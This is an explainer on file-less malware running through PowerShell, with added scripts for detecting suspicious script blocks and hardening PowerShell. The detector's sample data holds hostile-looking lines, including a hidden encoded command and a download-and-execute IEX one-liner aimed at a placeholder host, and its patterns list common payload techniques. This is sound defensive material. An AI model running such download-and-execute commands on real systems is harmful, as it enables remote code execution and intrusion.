File-less Malware Is Wreaking Havoc Via PowerShell
Advanced Volatile Threats (AVTs), also known as file-less malware, are another class of threat that works directly from memory. PowerShell is the main vehicle attackers adopt to carry out the attack.
The malware first plants malicious code on the target's system. While the system is running, the code begins to collect the credentials held on it.
In the case of one victimized company, the malicious code started gathering the credentials of its employees, including accounts with administrator permissions.
Its next step was to hunt for the organization's most valuable assets and go straight for them.
The code was designed too cleverly to be spotted by the company's security systems, and the organization was never alerted.
After doing this much damage to the company and its credibility, the code disappeared without a trace.
These AVTs surfaced around a year ago, and what sets them apart is that they operate in memory rather than on the hard drive.
Traditional, old-fashioned threat detection systems have practically no chance of sensing that something is fishy.
PowerShell is the basic medium used to carry out the file-less malware attack.
PowerShell lets system administrators completely automate tasks on servers and computers.
This means that if attackers take control of a server or computer, they can easily obtain as many permissions as they wish.
PowerShell is not limited to Windows itself; Microsoft Exchange, IIS and SQL servers fall into line as well.
What file-less malware does is force PowerShell to load its malicious code into the console and into RAM.
Once the code executes it becomes a "lateral" attack, meaning the attack propagates outward from the central server.
Because the malware leaves no traces behind once the dirty work is done, traditional security solutions are never able to identify what was behind the attack.
Only heuristic monitoring systems, if run constantly, could help trace the attack's culprit.
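The heuristic monitoring the article calls for starts with PowerShell's own script block log. The script below is an added example, not code from the original article: it scans script-block text for several indicators of in-memory activity and flags entries where two or more co-occur. The sample entries in $SampleScriptBlocks are constructed; the Get-WinEvent query uses the real Microsoft-Windows-PowerShell/Operational log and event ID 4104, which is only populated once script block logging has been enabled.

```powershell
# Added example (not from the original article): heuristic scan of PowerShell
# script-block log text. Patterns are deliberately broad; the indicator threshold
# keeps ordinary admin one-liners from being flagged on a single hit.

$SuspiciousPatterns = @(
    @{ Name = 'EncodedCommand';   Regex = '(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}' }
    @{ Name = 'InvokeExpression'; Regex = '(?i)\bIEX\b|Invoke-Expression' }
    @{ Name = 'WebDownload';      Regex = '(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest' }
    @{ Name = 'Base64Decode';     Regex = '(?i)FromBase64String' }
    @{ Name = 'HiddenWindow';     Regex = '(?i)-w(indowstyle)?\s+hidden' }
    @{ Name = 'ReflectiveLoad';   Regex = '(?i)\[Reflection\.Assembly\]::Load' }
)

function Find-SuspiciousScriptBlock {
    param(
        [Parameter(Mandatory)] [string[]] $ScriptBlockText,
        [int] $MinimumIndicators = 2   # one hit alone is often legitimate admin work
    )
    $index = 0
    foreach ($text in $ScriptBlockText) {
        $hits = @($SuspiciousPatterns | Where-Object { $text -match $_.Regex } | ForEach-Object { $_.Name })
        if ($hits.Count -ge $MinimumIndicators) {
            [PSCustomObject]@{
                Index      = $index
                Indicators = ($hits -join ', ')
                Preview    = $text.Substring(0, [Math]::Min(60, $text.Length))
            }
        }
        $index++
    }
}

function Get-ScriptBlockTextFromEventLog {
    param([int] $MaxEvents = 500)
    # Event 4104: Properties[2] carries the logged ScriptBlockText.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents |
        ForEach-Object { $_.Properties[2].Value }
}

# Constructed sample: two benign admin commands and two entries typical of file-less activity.
$SampleScriptBlocks = @(
    'Get-ChildItem C:\Users -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 20',
    'Get-Service | Where-Object Status -eq Running | Export-Csv C:\temp\services.csv',
    'powershell.exe -NoProfile -WindowStyle Hidden -Enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=',
    'IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage'')'
)

# Offline run on the constructed sample; on a real host feed it the live log instead:
#   Find-SuspiciousScriptBlock -ScriptBlockText (Get-ScriptBlockTextFromEventLog) | Format-Table -AutoSize
Find-SuspiciousScriptBlock -ScriptBlockText $SampleScriptBlocks | Format-Table -AutoSize
```

The two benign entries produce no output; the third is reported with EncodedCommand and HiddenWindow, the fourth with InvokeExpression and WebDownload. Because the scan works on what PowerShell itself logged at execution time, it sees the decoded script even when nothing was ever written to disk, which is exactly the blind spot of file-based scanners the article describes.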
Precautionary Measures Against Fileless Malware
- Disable PowerShell (if it is not required to administer systems).
- If it can't be disabled, ensure that you are using the latest version (PowerShell 5 has better security measures on Windows).
- Enable only the specific PowerShell features you need via "Constrained Language" mode.
- Enable automatic transcription of commands, which helps make file-less activity on the system visible.
- Employ advanced cyber-security methods such as permanently running anti-malware services.
- Constantly investigate unknown processes running on the system that could indicate file-less malware.
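The following script is an added example, not code from the original article, that checks and applies three of the measures above on a Windows host: it reports the installed version and language mode, turns on command transcription, and demonstrates what Constrained Language mode blocks. It also enables script block logging, which the list does not name but which the heuristic monitoring mentioned earlier depends on. Run it elevated in Windows PowerShell 5.1 or later. The registry paths are the documented Group Policy locations; C:\PSTranscripts is a constructed placeholder directory.

```powershell
# Added example (not from the original article). Requires an elevated session.

function Get-PowerShellHardeningState {
    [PSCustomObject]@{
        Version      = $PSVersionTable.PSVersion.ToString()
        IsV5OrLater  = $PSVersionTable.PSVersion.Major -ge 5
        LanguageMode = $ExecutionContext.SessionState.LanguageMode.ToString()
    }
}

function Set-PolicyDword {
    param([string] $Key, [string] $Name, [int] $Value)
    New-Item -Path $Key -Force | Out-Null
    New-ItemProperty -Path $Key -Name $Name -PropertyType DWord -Value $Value -Force | Out-Null
}

function Enable-PowerShellTranscription {
    # Placeholder directory; in production point this at a forwarded or write-only share
    # so an intruder cannot simply delete the transcripts afterwards.
    param([string] $OutputDirectory = 'C:\PSTranscripts')
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
    Set-PolicyDword -Key $key -Name 'EnableTranscripting'    -Value 1
    Set-PolicyDword -Key $key -Name 'EnableInvocationHeader' -Value 1   # timestamps each command
    New-ItemProperty -Path $key -Name 'OutputDirectory' -PropertyType String -Value $OutputDirectory -Force | Out-Null
    New-Item -ItemType Directory -Path $OutputDirectory -Force | Out-Null
}

function Enable-ScriptBlockLogging {
    # Writes event 4104 with the de-obfuscated script text to the PowerShell Operational log.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    Set-PolicyDword -Key $key -Name 'EnableScriptBlockLogging' -Value 1
}

function Test-ConstrainedLanguageMode {
    # Runs in a throwaway child process: once a session enters ConstrainedLanguage it
    # cannot switch back, so the current session is left untouched.
    & powershell.exe -NoProfile -NonInteractive -Command {
        $ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
        try   { $null = [System.IO.MemoryStream]::new(); 'allowed' }
        catch { 'blocked: ' + $_.Exception.Message }
    }
}

Get-PowerShellHardeningState
Enable-ScriptBlockLogging
Enable-PowerShellTranscription
Test-ConstrainedLanguageMode   # prints a "blocked: ..." line: arbitrary .NET types cannot be created in this mode
```

Setting the language mode inside one session, as the test function does, only shows the effect; enforcing it for every session on the host is done through an application control policy (Windows Defender Application Control or AppLocker), which PowerShell honours by dropping into Constrained Language mode automatically. Transcripts and script-block events are only useful if they leave the machine, so forward both to a log collector rather than relying on the local copies.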